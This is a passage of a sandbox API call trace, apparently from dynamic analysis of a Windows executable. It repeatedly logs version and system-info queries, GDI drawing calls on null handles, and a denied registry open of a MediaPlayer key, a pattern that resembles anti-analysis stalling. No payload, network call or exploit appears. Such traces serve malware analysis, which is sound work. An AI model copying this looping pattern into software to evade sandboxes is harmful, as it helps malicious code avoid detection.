dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.704] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.704] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.704] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.704] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.704] BeginPath (hdc=0x0) returned 0 [0017.704] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.704] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.704] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.704] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.704] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.704] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.704] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.704] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.704] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe4040713 [0017.704] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xda04027d [0017.704] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c64 [0017.704] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c65 [0017.704] CombineRgn (hrgnDst=0x1040c64, hrgnSrc1=0xe4040713, hrgnSrc2=0xda04027d, iMode=1) returned 1 [0017.704] CombineRgn (hrgnDst=0x1040c65, hrgnSrc1=0xe4040713, hrgnSrc2=0xda04027d, iMode=4) returned 2 [0017.704] CreateSolidBrush (color=0xff) returned 0x2100c63 [0017.704] CreateSolidBrush (color=0xff0000) returned 0x1100c66 [0017.704] DeleteObject (ho=0x1100c66) returned 1 [0017.704] DeleteObject (ho=0xda04027d) returned 1 [0017.704] DeleteObject (ho=0xe4040713) returned 1 [0017.704] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.704] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.704] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.704] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.704] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.704] BeginPath (hdc=0x0) returned 0 [0017.704] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.704] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.704] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.705] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.705] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.705] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.705] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.705] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.705] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdb04027d [0017.705] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe5040713 [0017.705] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c67 [0017.705] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c68 [0017.705] CombineRgn (hrgnDst=0x1040c67, hrgnSrc1=0xdb04027d, hrgnSrc2=0xe5040713, iMode=1) returned 1 [0017.705] CombineRgn (hrgnDst=0x1040c68, hrgnSrc1=0xdb04027d, hrgnSrc2=0xe5040713, iMode=4) returned 2 [0017.705] CreateSolidBrush (color=0xff) returned 0x2100c66 [0017.705] CreateSolidBrush (color=0xff0000) returned 0x1100c69 [0017.705] DeleteObject (ho=0x1100c69) returned 1 [0017.705] DeleteObject (ho=0xe5040713) returned 1 [0017.705] DeleteObject (ho=0xdb04027d) returned 1 [0017.705] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.705] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.705] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.705] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.705] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.705] BeginPath (hdc=0x0) returned 0 [0017.705] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.705] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.705] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.705] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.705] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.705] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.705] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.705] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.705] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe6040713 [0017.705] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdc04027d [0017.705] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c6a [0017.705] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c6b [0017.705] CombineRgn (hrgnDst=0x1040c6a, hrgnSrc1=0xe6040713, hrgnSrc2=0xdc04027d, iMode=1) returned 1 [0017.705] CombineRgn (hrgnDst=0x1040c6b, hrgnSrc1=0xe6040713, hrgnSrc2=0xdc04027d, iMode=4) returned 2 [0017.705] CreateSolidBrush (color=0xff) returned 0x2100c69 [0017.705] CreateSolidBrush (color=0xff0000) returned 0x1100c6c [0017.705] DeleteObject (ho=0x1100c6c) returned 1 [0017.706] DeleteObject (ho=0xdc04027d) returned 1 [0017.706] DeleteObject (ho=0xe6040713) returned 1 [0017.706] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.706] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.706] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.706] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.706] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.706] BeginPath (hdc=0x0) returned 0 [0017.706] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.706] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.706] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.706] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.706] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.706] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.706] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.706] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.706] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdd04027d [0017.706] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe7040713 [0017.706] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c6d [0017.706] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c6e [0017.706] CombineRgn (hrgnDst=0x1040c6d, hrgnSrc1=0xdd04027d, hrgnSrc2=0xe7040713, iMode=1) returned 1 [0017.706] CombineRgn (hrgnDst=0x1040c6e, hrgnSrc1=0xdd04027d, hrgnSrc2=0xe7040713, iMode=4) returned 2 [0017.706] CreateSolidBrush (color=0xff) returned 0x2100c6c [0017.706] CreateSolidBrush (color=0xff0000) returned 0x1100c6f [0017.706] DeleteObject (ho=0x1100c6f) returned 1 [0017.706] DeleteObject (ho=0xe7040713) returned 1 [0017.706] DeleteObject (ho=0xdd04027d) returned 1 [0017.706] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.706] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.706] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.706] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.706] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.706] BeginPath (hdc=0x0) returned 0 [0017.707] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.707] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.707] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.707] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.707] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.707] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.707] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.707] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.707] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe8040713 [0017.707] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xde04027d [0017.707] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c70 [0017.707] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c71 [0017.707] CombineRgn (hrgnDst=0x1040c70, hrgnSrc1=0xe8040713, hrgnSrc2=0xde04027d, iMode=1) returned 1 [0017.707] CombineRgn (hrgnDst=0x1040c71, hrgnSrc1=0xe8040713, hrgnSrc2=0xde04027d, iMode=4) returned 2 [0017.707] CreateSolidBrush (color=0xff) returned 0x2100c6f [0017.707] CreateSolidBrush (color=0xff0000) returned 0x1100c72 [0017.707] DeleteObject (ho=0x1100c72) returned 1 [0017.707] DeleteObject (ho=0xde04027d) returned 1 [0017.707] DeleteObject (ho=0xe8040713) returned 1 [0017.707] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.707] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.707] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.707] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.707] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.707] BeginPath (hdc=0x0) returned 0 [0017.707] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.707] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.707] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.707] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.707] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.707] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.708] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.708] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.708] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdf04027d [0017.708] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe9040713 [0017.708] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c73 [0017.708] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c74 [0017.708] CombineRgn (hrgnDst=0x1040c73, hrgnSrc1=0xdf04027d, hrgnSrc2=0xe9040713, iMode=1) returned 1 [0017.708] CombineRgn (hrgnDst=0x1040c74, hrgnSrc1=0xdf04027d, hrgnSrc2=0xe9040713, iMode=4) returned 2 [0017.708] CreateSolidBrush (color=0xff) returned 0x2100c72 [0017.708] CreateSolidBrush (color=0xff0000) returned 0x1100c75 [0017.708] DeleteObject (ho=0x1100c75) returned 1 [0017.708] DeleteObject (ho=0xe9040713) returned 1 [0017.708] DeleteObject (ho=0xdf04027d) returned 1 [0017.708] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.708] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.708] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.708] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.708] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.708] BeginPath (hdc=0x0) returned 0 [0017.708] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.708] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.708] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.708] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.708] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.708] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.708] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.708] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.709] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xea040713 [0017.709] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe004027d [0017.709] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c76 [0017.709] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c77 [0017.709] CombineRgn (hrgnDst=0x1040c76, hrgnSrc1=0xea040713, hrgnSrc2=0xe004027d, iMode=1) returned 1 [0017.709] CombineRgn (hrgnDst=0x1040c77, hrgnSrc1=0xea040713, hrgnSrc2=0xe004027d, iMode=4) returned 2 [0017.709] CreateSolidBrush (color=0xff) returned 0x2100c75 [0017.709] CreateSolidBrush (color=0xff0000) returned 0x1100c78 [0017.709] DeleteObject (ho=0x1100c78) returned 1 [0017.709] DeleteObject (ho=0xe004027d) returned 1 [0017.709] DeleteObject (ho=0xea040713) returned 1 [0017.709] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.709] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.709] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.709] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.709] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.709] BeginPath (hdc=0x0) returned 0 [0017.709] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.709] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.709] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.709] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.709] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.709] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.709] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.709] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.710] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe104027d [0017.710] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xeb040713 [0017.710] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c79 [0017.710] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c7a [0017.710] CombineRgn (hrgnDst=0x1040c79, hrgnSrc1=0xe104027d, hrgnSrc2=0xeb040713, iMode=1) returned 1 [0017.710] CombineRgn (hrgnDst=0x1040c7a, hrgnSrc1=0xe104027d, hrgnSrc2=0xeb040713, iMode=4) returned 2 [0017.710] CreateSolidBrush (color=0xff) returned 0x2100c78 [0017.710] CreateSolidBrush (color=0xff0000) returned 0x1100c7b [0017.710] DeleteObject (ho=0x1100c7b) returned 1 [0017.710] DeleteObject (ho=0xeb040713) returned 1 [0017.710] DeleteObject (ho=0xe104027d) returned 1 [0017.710] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.710] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.710] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.710] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.710] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.710] BeginPath (hdc=0x0) returned 0 [0017.710] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.710] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.710] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.710] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.710] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.710] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.710] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.710] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.710] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xec040713 [0017.710] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe204027d [0017.710] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c7c [0017.711] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c7d [0017.711] CombineRgn (hrgnDst=0x1040c7c, hrgnSrc1=0xec040713, hrgnSrc2=0xe204027d, iMode=1) returned 1 [0017.711] CombineRgn (hrgnDst=0x1040c7d, hrgnSrc1=0xec040713, hrgnSrc2=0xe204027d, iMode=4) returned 2 [0017.711] CreateSolidBrush (color=0xff) returned 0x2100c7b [0017.711] CreateSolidBrush (color=0xff0000) returned 0x1100c7e [0017.711] DeleteObject (ho=0x1100c7e) returned 1 [0017.711] DeleteObject (ho=0xe204027d) returned 1 [0017.711] DeleteObject (ho=0xec040713) returned 1 [0017.711] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.711] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.711] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.711] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.711] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.711] BeginPath (hdc=0x0) returned 0 [0017.711] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.711] AngleArc (hdc=0x0, x=0, y=0, 